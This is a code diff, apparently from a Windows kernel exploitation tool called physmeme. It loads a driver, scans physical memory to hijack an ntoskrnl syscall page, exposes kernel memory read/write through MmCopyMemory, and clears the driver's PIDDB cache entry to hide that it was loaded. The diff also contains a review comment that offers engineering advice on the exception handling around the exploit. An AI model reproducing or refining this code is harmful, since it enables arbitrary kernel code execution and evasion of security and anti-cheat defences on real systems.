stability patch for physmeme...

merge-requests/1/merge
xerox 4 years ago
parent 9ab20011fa
commit ea2f644ac0

@ -1,5 +1,4 @@
#include "kernel_ctx.h" #include "kernel_ctx.h"
#include "../mem_ctx/mem_ctx.hpp"
namespace nasa namespace nasa
{ {
@ -8,6 +7,13 @@ namespace nasa
if (psyscall_func.load() || nt_page_offset || ntoskrnl_buffer) if (psyscall_func.load() || nt_page_offset || ntoskrnl_buffer)
return; return;
ntoskrnl_buffer = reinterpret_cast<std::uint8_t*>(
LoadLibraryExA(
"ntoskrnl.exe",
NULL,
DONT_RESOLVE_DLL_REFERENCES
));
nt_rva = reinterpret_cast<std::uint32_t>( nt_rva = reinterpret_cast<std::uint32_t>(
util::get_module_export( util::get_module_export(
"ntoskrnl.exe", "ntoskrnl.exe",
@ -16,13 +22,6 @@ namespace nasa
)); ));
nt_page_offset = nt_rva % PAGE_SIZE; nt_page_offset = nt_rva % PAGE_SIZE;
ntoskrnl_buffer = reinterpret_cast<std::uint8_t*>(
LoadLibraryExA(
"ntoskrnl.exe",
NULL,
DONT_RESOLVE_DLL_REFERENCES
));
std::vector<std::thread> search_threads; std::vector<std::thread> search_threads;
//--- for each physical memory range, make a thread to search it //--- for each physical memory range, make a thread to search it
for (auto ranges : util::pmem_ranges) for (auto ranges : util::pmem_ranges)
@ -43,29 +42,34 @@ namespace nasa
if (begin + end <= 0x1000 * 512) if (begin + end <= 0x1000 * 512)
{ {
auto page_va = nasa::map_phys(begin + nt_page_offset, end); auto page_va = nasa::map_phys(begin + nt_page_offset, end);
last_mapped_virt.store((void*)page_va);
last_mapping_size.store(end);
if (page_va) if (page_va)
{ {
// scan every page of the physical memory range // scan every page of the physical memory range
for (auto page = page_va; page < page_va + end; page += 0x1000) for (auto page = page_va; page < page_va + end; page += 0x1000)
{
if (!is_page_found.load()) // keep scanning until its found if (!is_page_found.load()) // keep scanning until its found
if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32)) {
__try
{ {
// if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! {
// //
psyscall_func.store((void*)page); // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandleA(NULL)); //
auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId())); psyscall_func.store((void*)page);
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandleA(NULL));
if (my_proc_base != my_proc_base_from_syscall) auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
continue;
if (my_proc_base != my_proc_base_from_syscall)
is_page_found.store(true); continue;
return;
is_page_found.store(true);
return;
}
} }
__except (EXCEPTION_EXECUTE_HANDLER) {}
}
}
nasa::unmap_phys(page_va, end); nasa::unmap_phys(page_va, end);
} }
} }
@ -77,9 +81,6 @@ namespace nasa
for (auto range = begin; range < begin + end; range += 0x1000 * 512) for (auto range = begin; range < begin + end; range += 0x1000 * 512)
{ {
auto page_va = nasa::map_phys(range + nt_page_offset, 0x1000 * 512); auto page_va = nasa::map_phys(range + nt_page_offset, 0x1000 * 512);
last_mapped_virt.store((void*)page_va);
last_mapping_size.store(0x1000 * 512);
if (page_va) if (page_va)
{ {
// loop every page of 2mbs (512) // loop every page of 2mbs (512)
@ -87,21 +88,25 @@ namespace nasa
{ {
if (!is_page_found.load()) if (!is_page_found.load())
{ {
if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32)) __try
{ {
// if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! {
// //
psyscall_func.store((void*)page); // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL)); //
auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId())); psyscall_func.store((void*)page);
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL));
if (my_proc_base != my_proc_base_from_syscall) auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
continue;
if (my_proc_base != my_proc_base_from_syscall)
is_page_found.store(true); continue;
return;
is_page_found.store(true);
return;
}
} }
__except (EXCEPTION_EXECUTE_HANDLER) {}
} }
} }
nasa::unmap_phys(page_va, 0x1000 * 512); nasa::unmap_phys(page_va, 0x1000 * 512);
@ -110,30 +115,31 @@ namespace nasa
// map the remainder and check each page of it // map the remainder and check each page of it
auto page_va = nasa::map_phys(begin + end - remainder + nt_page_offset, remainder); auto page_va = nasa::map_phys(begin + end - remainder + nt_page_offset, remainder);
last_mapped_virt.store((void*)page_va);
last_mapping_size.store(remainder);
if (page_va) if (page_va)
{ {
for (auto page = page_va; page < page_va + remainder; page += 0x1000) for (auto page = page_va; page < page_va + remainder; page += 0x1000)
{ {
if (!is_page_found.load()) if (!is_page_found.load())
{ {
if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32)) __try
{ {
// if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! {
// //
psyscall_func.store((void*)page); // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL)); //
auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId())); psyscall_func.store((void*)page);
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL));
if (my_proc_base != my_proc_base_from_syscall) auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
continue;
if (my_proc_base != my_proc_base_from_syscall)
is_page_found.store(true); continue;
return;
is_page_found.store(true);
return;
}
} }
__except (EXCEPTION_EXECUTE_HANDLER) {}
} }
} }
nasa::unmap_phys(page_va, remainder); nasa::unmap_phys(page_va, remainder);
@ -197,12 +203,15 @@ namespace nasa
); );
if (mm_copy_memory) if (mm_copy_memory)
syscall<decltype(&memcpy)>( {
syscall<decltype(&memcpy)>
(
mm_copy_memory, mm_copy_memory,
buffer, buffer,
address, address,
size size
); );
}
} }
void kernel_ctx::wkm(void* buffer, void* address, std::size_t size) void kernel_ctx::wkm(void* buffer, void* address, std::size_t size)
@ -218,12 +227,15 @@ namespace nasa
); );
if (mm_copy_memory) if (mm_copy_memory)
syscall<decltype(&memcpy)>( {
syscall<decltype(&memcpy)>
(
mm_copy_memory, mm_copy_memory,
address, address,
buffer, buffer,
size size
); );
}
} }
void* kernel_ctx::get_physical(void* virt_addr) void* kernel_ctx::get_physical(void* virt_addr)
@ -237,10 +249,7 @@ namespace nasa
"MmGetPhysicalAddress" "MmGetPhysicalAddress"
); );
return syscall<MmGetPhysicalAddress>( return syscall<MmGetPhysicalAddress>(mm_get_physical, virt_addr);
mm_get_physical,
virt_addr
);
} }
void* kernel_ctx::get_virtual(void* addr) void* kernel_ctx::get_virtual(void* addr)
@ -256,10 +265,7 @@ namespace nasa
PHYSICAL_ADDRESS phys_addr; PHYSICAL_ADDRESS phys_addr;
memcpy(&phys_addr, &addr, sizeof(addr)); memcpy(&phys_addr, &addr, sizeof(addr));
return syscall<MmGetVirtualForPhysical>( return syscall<MmGetVirtualForPhysical>(mm_get_virtual,phys_addr);
mm_get_virtual,
phys_addr
);
} }
bool kernel_ctx::clear_piddb_cache(const std::string& file_name, const std::uint32_t timestamp) bool kernel_ctx::clear_piddb_cache(const std::string& file_name, const std::uint32_t timestamp)
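Review bot: The `__except (EXCEPTION_EXECUTE_HANDLER) {}` wrapped around the page compare in hunk `@ -43,29 +42,34 @@` (and identically in `@ -87,21 +88,25 @@` and `@ -110,30 +115,31 @@`) catches every SEH exception and discards it, so a fault inside `get_proc_base`, a `memcmp` through a null `ntoskrnl_buffer` (the `LoadLibraryExA` result in `@ -8,6 +7,13 @@` is stored without a null check), or any other unexpected error in the thread becomes a silent "keep looking" with no diagnostic. Narrowing the filter keeps the intended stability fix while letting genuine bugs surface: `__except (GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {}`. The three guarded bodies are byte-for-byte copies, so the filter and the compare-then-verify logic would be better factored into one static helper called from each loop, which also limits the `continue`/`return` jumps out of a `__try` block (each one forces a local unwind) to a single place. The enclosing function starts and ends outside these hunks, and the removed `last_mapped_virt`/`last_mapping_size` stores presumably fed a cleanup path elsewhere — worth confirming nothing still reads them before they go.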

@ -4,11 +4,10 @@
int __cdecl main(int argc, char** argv) int __cdecl main(int argc, char** argv)
{ {
// only time driver needs to be loaded is to init physmeme/kernel_ctx...
nasa::load_drv(); nasa::load_drv();
nasa::kernel_ctx kernel; nasa::kernel_ctx kernel;
if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp)) if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp))
std::cout << "[+] flushed PIDDB Cache for physmeme driver..." << std::endl; std::cout << "[+] Removed PIDDB Cache entry for physmeme driver..." << std::endl;
nasa::unload_drv(); nasa::unload_drv();
const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(), virt_addr_t{ GetModuleHandle(NULL) } }; const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(), virt_addr_t{ GetModuleHandle(NULL) } };

@ -100,9 +100,6 @@ namespace nasa
void* mem_ctx::set_page(void* addr) void* mem_ctx::set_page(void* addr)
{ {
if (!addr)
return {};
// //
// table entry change. // table entry change.
// //
